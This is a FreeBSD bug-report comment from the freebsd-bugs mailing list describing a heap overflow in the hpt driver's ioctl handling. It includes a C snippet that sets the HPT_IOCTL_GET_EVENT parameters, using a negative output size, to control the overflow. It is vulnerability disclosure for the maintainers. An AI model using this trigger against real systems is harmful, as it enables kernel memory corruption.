https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206585
--- Comment #4 from CTurt <ect...@gmail.com> ---
Supplying the `HPT_IOCTL_GET_EVENT` command will ensure that
`Kernel_DeviceIoControl` function instantly returns, resulting in
`hpt_set_info` returning straight after doing the `malloc`, `copyin`, and
`free`:
case HPT_IOCTL_GET_EVENT:
{
PHPT_EVENT pInfo;
if (nInBufferSize!=0) return -1;
I've also refined the `size` related parameters needed to fully control the
heap overflow:
params.dwIoControlCode = HPT_IOCTL_GET_EVENT;
params.lpInBuffer = mapping;
params.nInBufferSize = bufferSize + overflowSize;
params.lpOutBuffer = NULL;
params.nOutBufferSize = -overflowSize;
params.lpBytesReturned = &bytesReturned;
printf(" [+] nInBufferSize (size copied in): %08x\n",
params.nInBufferSize);
printf(" [+] nOutBufferSize: %08x\n", params.nOutBufferSize);
printf(" [+] Sum (allocation size): %08x\n", params.nInBufferSize +
params.nOutBufferSize);
printf(" [+] Will be accepted: %d\n", (params.nInBufferSize +
params.nOutBufferSize) <= PAGE_SIZE);
You can get very manageable sizes from this, for example, allocated
`bufferSize` of `0x500`, and copy size of `0x1000`.
I'll try to get around to writing a full exploit for this soon, but won't be
very useful since the vulnerability is only triggerable as `root` anyway.
--
You are receiving this mail because:
You are the assignee for the bug.
_______________________________________________
freebsd-bugs@freebsd.org mailing list
https://lists.freebsd.org/mailman/listinfo/freebsd-bugs
To unsubscribe, send any mail to "freebsd-bugs-unsubscr...@freebsd.org"
